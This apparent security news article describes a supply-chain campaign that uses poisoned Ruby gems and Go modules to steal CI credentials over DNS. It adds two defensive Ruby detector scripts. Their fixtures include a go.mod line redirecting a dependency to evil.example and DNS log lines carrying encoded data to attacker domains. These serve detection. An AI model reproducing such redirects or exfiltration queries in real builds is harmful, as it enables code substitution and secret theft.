Poisoned Ruby Gems and Go Modules Hijack CI Pipelines for Credential Theft
Security researchers at SentinelLabs have uncovered a supply‑chain campaign, dubbed "Nightshade," that plants dormant malicious code in widely used Ruby gems and Go modules. On the Ruby side the attackers slipped a small install‑time (post‑install) hook into gems such as colorize and tzinfo; on the Go side they introduced a replace directive that redirects the yaml.v2 module to a hostile copy served from an untrusted domain. One caveat for Go builds: the toolchain honours replace only in the main module's go.mod, so the directive has to be present in the consuming project's own go.mod to take effect, and replace lines inside a dependency's go.mod are ignored. The payload stays inert until it finds the CI environment variable set (most hosted CI services export CI=true), so it runs only inside continuous‑integration builds and never on a developer's workstation, where it would be far more likely to be noticed.
Once the sleeper code fires, it harvests a broad range of CI secrets, among them GitHub tokens, AWS access keys and npm publishing tokens, and exfiltrates them in DNS TXT queries to the attacker‑controlled domain ci-c2[.]xyz. DNS is a convenient channel because CI runners almost always allow outbound name resolution even where HTTP egress is filtered. With the stolen credentials the attackers inject a rogue step into the victim's GitHub Actions workflows that copies repository secrets to a shadow repository under their control. They also modify files under .github/workflows to add a job that pushes altered artifacts back to the original repository, tampering with the pipeline's output and establishing persistent access.
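The two mechanisms described above, the redirected Go dependency and the DNS exfiltration, both leave artefacts that can be checked for mechanically. The following Ruby script is an added example, not code from the SentinelLabs report or from any of the affected projects: it audits a go.mod for replace directives whose target lies outside an approved set of module prefixes, and scans BIND‑style DNS query‑log lines for TXT queries to the named C2 domain or with a long encoded leftmost label. The APPROVED_REPLACE_PREFIXES list, the log format and all sample inputs are assumptions constructed for the example.

```ruby
# Added example, not code from the SentinelLabs report. Two detectors for the
# mechanisms the article describes: a go.mod replace directive that points a
# dependency at an unapproved module path, and DNS TXT queries carrying
# exfiltrated secrets. All inputs below are constructed samples, not captured data.

# Assumption: in this organisation the only legitimate replace targets are
# forks under its own GitHub org. Adjust to your own policy.
APPROVED_REPLACE_PREFIXES = %w[github.com/example-org/].freeze

# Domain named as an IOC in the article.
C2_DOMAIN = 'ci-c2.xyz'.freeze

# Go applies `replace` only from the main module's go.mod, so that is the file
# to audit. Returns one hash per replacement whose target is a remote module
# path outside APPROVED_REPLACE_PREFIXES (filesystem replacements are skipped).
def suspicious_replaces(go_mod_text)
  findings = []
  in_block = false
  go_mod_text.each_line do |raw|
    line = raw.sub(%r{//.*}, '').strip           # drop comments
    next if line.empty?
    if line.match?(/\Areplace\s*\(\z/)           # start of a replace ( ... ) block
      in_block = true
      next
    end
    if in_block && line == ')'
      in_block = false
      next
    end
    next unless in_block || line.start_with?('replace ')
    lhs, rhs = line.sub(/\Areplace\s+/, '').split('=>', 2).map(&:strip)
    next unless lhs && rhs
    target = rhs.split(/\s+/).first                # module path, version dropped
    next if target.start_with?('.', '/')           # local path, no network fetch
    next if target.start_with?(*APPROVED_REPLACE_PREFIXES)
    findings << { original: lhs.split(/\s+/).first, replacement: target }
  end
  findings
end

# Scans query-log lines of the form "... query: <qname> IN <qtype> ..." and
# flags any query to the C2 domain, plus TXT queries whose leftmost label is
# long and made only of [a-z0-9], the usual shape of data encoded into DNS.
def suspicious_dns_queries(log_text)
  log_text.each_line.filter_map do |line|
    m = line.match(/query:\s+(\S+)\s+IN\s+(\S+)/)
    next unless m
    qname = m[1].chomp('.').downcase
    qtype = m[2].upcase
    first_label = qname.split('.').first.to_s
    to_c2 = qname == C2_DOMAIN || qname.end_with?(".#{C2_DOMAIN}")
    encoded = qtype == 'TXT' && first_label.length >= 32 && first_label.match?(/\A[a-z0-9]+\z/)
    next unless to_c2 || encoded
    { qname: qname, qtype: qtype,
      reason: to_c2 ? 'query to known C2 domain' : 'long encoded label in TXT query' }
  end
end

# Constructed go.mod: one hostile-looking replacement, one harmless local one.
SAMPLE_GO_MOD = <<~GOMOD
  module example.com/app

  go 1.21

  require gopkg.in/yaml.v2 v2.4.0

  replace (
      gopkg.in/yaml.v2 => evil.example/yaml v2.4.0 // hypothetical hostile mirror
      example.com/internal => ./internal
  )
GOMOD

# Constructed BIND-style query log: one benign A query, one TXT query to the
# C2 domain, one legitimate TXT lookup, one encoded TXT query to an unknown zone.
SAMPLE_DNS_LOG = <<~LOG
  12-Mar-2024 10:01:02.001 client 10.0.0.5#51234: query: github.com IN A + (10.0.0.1)
  12-Mar-2024 10:01:03.120 client 10.0.0.5#51235: query: Z2hwX2FiYw.ci-c2.xyz IN TXT + (10.0.0.1)
  12-Mar-2024 10:01:04.330 client 10.0.0.5#51236: query: _dmarc.example.com IN TXT + (10.0.0.1)
  12-Mar-2024 10:01:05.500 client 10.0.0.5#51237: query: mfrggzdfmztwq2lknnwg23tpobyxe43uov3ho6dzpi.exfil.example IN TXT + (10.0.0.1)
LOG

if $PROGRAM_NAME == __FILE__
  suspicious_replaces(SAMPLE_GO_MOD).each { |f| puts "go.mod: #{f[:original]} replaced by #{f[:replacement]}" }
  suspicious_dns_queries(SAMPLE_DNS_LOG).each { |h| puts "dns: #{h[:qname]} #{h[:qtype]} (#{h[:reason]})" }
end
```

Run it against a real repository with `suspicious_replaces(File.read('go.mod'))` and feed `suspicious_dns_queries` the resolver log from the CI network. A prefix allow‑list is deliberately coarse: a fork hosted under an attacker's own GitHub account would be caught only because it is not under the approved org, so keep the list to paths you actually control. The 32‑character threshold for the encoded‑label heuristic is a starting point; tune it against your own baseline of TXT lookups (DKIM selectors and similar legitimate records are short and usually contain underscores, so they do not match).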
The research team spotted the DNS callbacks and the rogue workflow steps during a routine audit of public CI logs. Published indicators of compromise (IOCs) are the file hash sha256: a3f8b2c9..., the domain ci-c2[.]xyz and the injected workflow file ci-inject.yml. Organizations are advised to audit their dependency lockfiles (Gemfile.lock, go.mod and go.sum), pin gem and module versions exactly, and immediately rotate any CI secret that was available to an affected build: an exfiltrated token stays valid until it is revoked, so rotation cannot wait for the dependency clean‑up. Restricting CI egress to an allow‑list of domains (including DNS, since that was the exfiltration channel here) and enabling GitHub's dependency review feature also reduce the blast radius of similar sleeper‑package attacks.
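Auditing lockfiles and pinning versions, as recommended above, is easy to state and easy to get wrong, because a Gemfile is Ruby code and evaluating an untrusted one is itself code execution. The script below is an added example written for this page, not code from the article, from Bundler or from any affected gem: it reads a Gemfile and its Gemfile.lock as text, reports which gems are pinned exactly, which float within a range, which carry no constraint at all, and which have a locked version that violates the Gemfile constraint (something a clean bundle install never produces). The sample Gemfile and lockfile are constructed for the example.

```ruby
# Added example, not code from the article or from Bundler. Audits a Gemfile
# against its Gemfile.lock without evaluating the Gemfile (a Gemfile is Ruby
# code, so loading an untrusted one is itself arbitrary code execution).
# Sample inputs are constructed, not taken from a real repository.
require 'rubygems'

# Matches `gem 'name', 'req', 'req2', ...` and returns { name => [reqs] }.
# Gems declared through loops, eval or helper methods are not seen; that is
# the price of not executing the file.
def gemfile_declarations(gemfile_text)
  gemfile_text.each_line.filter_map do |line|
    m = line.match(/\A\s*gem\s+['"]([^'"]+)['"]((?:\s*,\s*['"][^'"]*['"])*)/)
    next unless m
    [m[1], m[2].scan(/['"]([^'"]*)['"]/).flatten]
  end.to_h
end

# Resolved versions from the lockfile's `specs:` block: exactly four spaces of
# indent, then `name (version)`. Transitive dependency lines are indented deeper.
def locked_versions(lockfile_text)
  lockfile_text.each_line.filter_map do |line|
    m = line.match(/\A {4}(\S+) \(([^)]+)\)\s*\z/)
    m && [m[1], m[2]]
  end.to_h
end

# One report row per declared gem:
#   :pinned         exact "= x.y.z" constraint
#   :floating       a range such as "~> 2.0"; a poisoned release inside the
#                   range is picked up by the next fresh resolve
#   :unconstrained  no version given at all
#   :lock_mismatch  locked version violates the Gemfile constraint, which a
#                   clean `bundle install` never produces
def audit_pins(gemfile_text, lockfile_text)
  locked = locked_versions(lockfile_text)
  gemfile_declarations(gemfile_text).map do |name, reqs|
    requirement = reqs.empty? ? Gem::Requirement.default : Gem::Requirement.new(reqs)
    version = locked[name] && Gem::Version.new(locked[name])
    status =
      if version && !requirement.satisfied_by?(version) then :lock_mismatch
      elsif reqs.empty?                                   then :unconstrained
      elsif requirement.exact?                            then :pinned
      else                                                     :floating
      end
    { gem: name, requirement: requirement.to_s, locked: locked[name], status: status }
  end
end

# Constructed Gemfile covering each case the audit distinguishes.
SAMPLE_GEMFILE = <<~GEMFILE
  source 'https://rubygems.org'
  gem 'colorize', '1.1.0'          # exact pin
  gem 'tzinfo', '~> 2.0'           # floats within 2.x
  gem 'rake'                       # no constraint at all
  gem 'nokogiri', '= 1.15.0'       # pinned, but see the lockfile below
GEMFILE

# Constructed Gemfile.lock; nokogiri's locked version is outside its constraint.
SAMPLE_LOCKFILE = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      colorize (1.1.0)
      concurrent-ruby (1.2.3)
      nokogiri (1.16.0)
      rake (13.1.0)
      tzinfo (2.0.6)
        concurrent-ruby (~> 1.0)

  PLATFORMS
    ruby

  DEPENDENCIES
    colorize (= 1.1.0)
    nokogiri (= 1.15.0)
    rake
    tzinfo (~> 2.0)
LOCK

if $PROGRAM_NAME == __FILE__
  audit_pins(SAMPLE_GEMFILE, SAMPLE_LOCKFILE).each do |row|
    puts format('%-16s %-14s locked=%-8s %s', row[:gem], row[:requirement], row[:locked], row[:status])
  end
end
```

Against a real checkout, call `audit_pins(File.read('Gemfile'), File.read('Gemfile.lock'))`. The audit complements rather than replaces the toolchain's own guards: run `bundle install` with `BUNDLE_FROZEN=true` so CI refuses to re‑resolve a lockfile that drifted from the Gemfile, and `go mod verify` on the Go side so any module whose on‑disk contents differ from the hashes in go.sum fails the build.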